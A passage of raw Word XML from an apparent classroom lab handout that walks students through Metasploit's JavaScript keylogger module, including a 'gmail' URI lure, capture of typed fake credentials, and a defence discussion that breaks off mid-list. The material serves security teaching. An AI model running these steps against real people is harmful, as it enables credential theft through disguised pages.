              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">msf &gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Start the Keylogger Attack</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">• Type </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">use auxiliary/server/capture/http_javascript_keylogger</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Look at the options for this attack: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">show options</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Turn the keylogger demo on </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">set demo True</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Set the keylogger server port to port 1717: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">set SRVPORT 1717</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:i w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Set the server host: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">set SRVHOST </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:i w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Kali_IP_Address</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Run the keylogger attack: Type </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">run </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">to start the server</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Starting the Attack</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Break/Stop the server by pressing </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CTRL+C</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Now, set the URI path the “Gmail”: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">set URIPATH gmail</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Rerun the capture: Type </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">run</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Write down the URL the server is currently using. It should look like the following:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">           </w:t>
            </w:r>
            <w:hyperlink r:id="rId6">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="38761d"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">http://10.1.90.93:1717/gmail</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Playing the Victim</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">In the Windows environment, open the Chrome Browser</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Go to the website of the URL you wrote down.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Add “</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/demo</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">” to the end of this URL. It should look something like the following</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:i w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">           </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">http://10.1.57.93:1717/gmail/demo</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">You should see a "</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Keylogger Demo Form</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">" page</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Type in fake credentials as if you were going to log into a website</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Seeing the Attack</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Go back to Kali</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Notice it recorded every keystroke!</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Discuss ways to defend against a Key Logger</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Only use credentials at trusted websites!</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">What was the website URL you entered your credentials in?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Avoid re-using passwords across multiple websites</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
